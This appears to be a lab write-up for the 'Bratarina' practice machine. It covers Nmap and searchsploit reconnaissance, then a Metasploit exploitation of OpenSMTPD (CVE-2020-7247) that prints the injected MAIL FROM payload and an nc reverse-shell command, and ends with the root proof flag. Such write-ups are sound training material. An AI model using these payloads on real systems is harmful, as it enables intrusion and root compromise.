Bratarina
Intro
# Nmap 7.94SVN scan initiated Fri Mar 22 09:11:34 2024 as: nmap -sC -sV -vv -oA nmap/initial bratarina.pg
Nmap scan report for bratarina.pg (192.168.202.71)
Host is up, received echo-reply ttl 61 (0.040s latency).
Scanned at 2024-03-22 09:11:36 CDT for 51s
Not shown: 995 filtered tcp ports (no-response)
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 61 OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 db:dd:2c:ea:2f:85:c5:89:bc:fc:e9:a3:38:f0:d7:50 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDJ0GZmmFtQUJbj2HgPsye2Xccyyh9mC8fsCwIivM4x3o3mwZDNi6g+Y6nIs5SuOJj2IpS+E9O5wB71MSIv7d7XYrd6paprfvnvMCyAQ9VTn8py6CQ/OsgeOITU+JnAxoe3WQklpyAVqhJ7ASqAInZF8oHDaebr6gBKEq4nkoLOtJSZeB8xWDHhbQZjG6AY81Y2mHPZH/LC4gSXpSmw+3h0zhlCN/kxeyhjrsrZqIVdKhg4emds8+gQyu1Wrz4AUUBGscI6Sh5rjImr+SC4rAGgn6N0MVPcZA1mS0JUplz758Y3YFXstqO2SdaHB/Qb50fkcpclcYKibSbCv5ZLNzOf
| 256 e3:b7:65:c2:a7:8e:45:29:bb:62:ec:30:1a:eb:ed:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBOWgZAzhJ+plc4Rk/YyGvQ1KOKK9j31ix1uCWIAirjnZS/lKwcvYrkG+lVsJRBnBYVA+67ILSJR2YNVz9uZshPE=
| 256 d5:5b:79:5b:ce:48:d8:57:46:db:59:4f:cd:45:5d:ef (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIC2Z9krPXlbEN6Xl40sc3BiVLfhbtd+l5ZFNBKkF7pYT
25/tcp open smtp syn-ack ttl 61 OpenSMTPD
| smtp-commands: bratarina Hello bratarina.pg [192.168.45.152], pleased to meet you, 8BITMIME, ENHANCEDSTATUSCODES, SIZE 36700160, DSN, HELP
|_ 2.0.0 This is OpenSMTPD 2.0.0 To report bugs in the implementation, please contact bugs@openbsd.org 2.0.0 with full details 2.0.0 End of HELP info
53/tcp closed domain reset ttl 61
80/tcp open http syn-ack ttl 61 nginx 1.14.0 (Ubuntu)
|_http-server-header: nginx/1.14.0 (Ubuntu)
|_http-title: Page not found - FlaskBB
445/tcp open netbios-ssn syn-ack ttl 61 Samba smbd 4.7.6-Ubuntu (workgroup: COFFEECORP)
Service Info: Host: bratarina; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
| p2p-conficker:
| Checking for Conficker.C or higher...
| Check 1 (port 22038/tcp): CLEAN (Timeout)
| Check 2 (port 53384/tcp): CLEAN (Timeout)
| Check 3 (port 21897/udp): CLEAN (Timeout)
| Check 4 (port 39979/udp): CLEAN (Timeout)
|_ 0/4 checks are positive: Host is CLEAN or ports are blocked
| smb2-time:
| date: 2024-03-22T14:11:53
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: bratarina
| NetBIOS computer name: BRATARINA\x00
| Domain name: \x00
| FQDN: bratarina
|_ System time: 2024-03-22T10:11:52-04:00
|_clock-skew: mean: 1h20m02s, deviation: 2h18m35s, median: 1s
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Fri Mar 22 09:12:27 2024 -- 1 IP address (1 host up) scanned in 53.37 seconds
Open Ports
22/tcp - OpenSSH 7.6p1
25/tcp - OpenSMTPD
80/tcp - nginx 1.14.0
445/tcp - Samba smbd 4.7.6
OpenSMTPD Exploits
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
OpenSMTPD - MAIL FROM Remote Code Execution (Metasploit) | linux/remote/48038.rb
OpenSMTPD - OOB Read Local Privilege Escalation (Metasploit) | linux/local/48185.rb
OpenSMTPD 6.4.0 < 6.6.1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48051.pl
OpenSMTPD 6.6.1 - Remote Code Execution | linux/remote/47984.py
OpenSMTPD 6.6.3 - Arbitrary File Read | linux/remote/48139.c
OpenSMTPD < 6.6.3p1 - Local Privilege Escalation + Remote Code Execution | openbsd/remote/48140.c
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Shellcodes: No Results
Samba Exploits
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Exploit Title | Path
---------------------------------------------------------------------------------------------------------------- ---------------------------------
Samba 3.0.10 (OSX) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | osx/remote/16875.rb
Samba 3.0.10 < 3.3.5 - Format String / Security Bypass | multiple/remote/10095.txt
Samba 3.0.20 < 3.0.25rc3 - 'Username' map script' Command Execution (Metasploit) | unix/remote/16320.rb
Samba 3.0.21 < 3.0.24 - LSA trans names Heap Overflow (Metasploit) | linux/remote/9950.rb
Samba 3.0.24 (Linux) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | linux/remote/16859.rb
Samba 3.0.24 (Solaris) - 'lsa_io_trans_names' Heap Overflow (Metasploit) | solaris/remote/16329.rb
Samba 3.0.27a - 'send_mailslot()' Remote Buffer Overflow | linux/dos/4732.c
Samba 3.0.29 (Client) - 'receive_smb_raw()' Buffer Overflow (PoC) | multiple/dos/5712.pl
Samba 3.0.4 - SWAT Authorisation Buffer Overflow | linux/remote/364.pl
Samba 3.3.12 (Linux x86) - 'chain_reply' Memory Corruption (Metasploit) | linux_x86/remote/16860.rb
Samba 3.3.5 - Format String / Security Bypass | linux/remote/33053.txt
Samba 3.4.16/3.5.14/3.6.4 - SetInformationPolicy AuditEventsInfo Heap Overflow (Metasploit) | linux/remote/21850.rb
Samba 3.4.5 - Symlink Directory Traversal | linux/remote/33599.txt
Samba 3.4.5 - Symlink Directory Traversal (Metasploit) | linux/remote/33598.rb
Samba 3.4.7/3.5.1 - Denial of Service | linux/dos/12588.txt
Samba 3.5.0 - Remote Code Execution | linux/remote/42060.py
Samba 3.5.0 < 4.4.14/4.5.10/4.6.4 - 'is_known_pipename()' Arbitrary Module Load (Metasploit) | linux/remote/42084.rb
Samba 3.5.11/3.6.3 - Remote Code Execution | linux/remote/37834.py
Samba 3.5.22/3.6.17/4.0.8 - nttrans Reply Integer Overflow | linux/dos/27778.txt
---------------------------------------------------------------------------------------------------------------- ---------------------------------
None of these apply to the Samba 4.7.6 on 445/tcp: the newest entry, the 'is_known_pipename()' arbitrary module load (CVE-2017-7494), was fixed in 4.4.14/4.5.10/4.6.4, so SMB was set aside and OpenSMTPD on 25/tcp was targeted instead.
Initial Foothold
msf6 exploit(unix/smtp/opensmtpd_mail_from_rce) > show options
Module options (exploit/unix/smtp/opensmtpd_mail_from_rce):
Name Current Setting Required Description
---- --------------- -------- -----------
RCPT_TO root yes Valid mail recipient
RHOSTS bratarina.pg yes The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
RPORT 25 yes The target port (TCP)
Payload options (cmd/unix/reverse_netcat):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.45.152 yes The listen address (an interface may be specified)
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 OpenSMTPD 6.4.0 - 6.6.1
View the full module info with the info, or info -d command.
msf6 exploit(unix/smtp/opensmtpd_mail_from_rce) > run
[*] Started reverse TCP handler on 192.168.45.152:80
[*] 192.168.202.71:25 - Running automatic check ("set AutoCheck false" to disable)
[!] 192.168.202.71:25 - The service is running, but could not be validated.
[*] 192.168.202.71:25 - Connecting to OpenSMTPD
[*] 192.168.202.71:25 - Saying hello and sending exploit
[*] 192.168.202.71:25 - Expecting: /220.*OpenSMTPD/
[*] 192.168.202.71:25 - Sending: HELO Fu9Gr5sSrBNw0zZ2a
[*] 192.168.202.71:25 - Expecting: /250.*pleased to meet you/
[*] 192.168.202.71:25 - Sending: MAIL FROM:<;for l in M Q e 4 o v 1 D j E T t 8 M;do read l;done;sh;exit 0;>
[*] 192.168.202.71:25 - Expecting: /250.*Ok/
[*] 192.168.202.71:25 - Sending: RCPT TO:<root>
[*] 192.168.202.71:25 - Expecting: /250.*Recipient ok/
[*] 192.168.202.71:25 - Sending: DATA
[*] 192.168.202.71:25 - Expecting: /354 Enter mail.*itself/
[*] 192.168.202.71:25 - Sending:
#
#
#
#
#
#
#
#
#
#
#
#
#
#
mkfifo /tmp/fnmudoa; nc 192.168.45.152 80 0</tmp/fnmudoa | /bin/sh >/tmp/fnmudoa 2>&1; rm /tmp/fnmudoa
[*] 192.168.202.71:25 - Sending: .
[*] 192.168.202.71:25 - Expecting: /250.*Message accepted for delivery/
[*] 192.168.202.71:25 - Sending: QUIT
[*] 192.168.202.71:25 - Expecting: /221.*Bye/
[*] Command shell session 1 opened (192.168.45.152:80 -> 192.168.202.71:42038) at 2024-03-22 10:06:00 -0500
whoami
root
pwd
/root
ls -la
total 28
drwx------ 4 root root 4096 Mar 22 10:08 .
drwxr-xr-x 23 root root 4096 Jul 6 2020 ..
-rw------- 1 root root 0 Jul 9 2020 .bash_history
-rw-r--r-- 1 root root 3106 Apr 9 2018 .bashrc
drwx------ 2 root root 4096 Jul 6 2020 .cache
drwx------ 3 root root 4096 Jul 6 2020 .gnupg
-rw-r--r-- 1 root root 148 Aug 17 2015 .profile
-rw-r--r-- 1 root root 33 Mar 22 10:08 proof.txt
cat proof.txt
470915275876f89210c9911a6fa0c973
Privilege Escalation
No privilege escalation was required. The OpenSMTPD bug (CVE-2020-7247) injects into the command line OpenSMTPD hands to its local delivery agent, which runs with the privileges used to deliver to the recipient; with RCPT_TO set to root the payload therefore executed as root, and the session above landed directly in /root with proof.txt readable.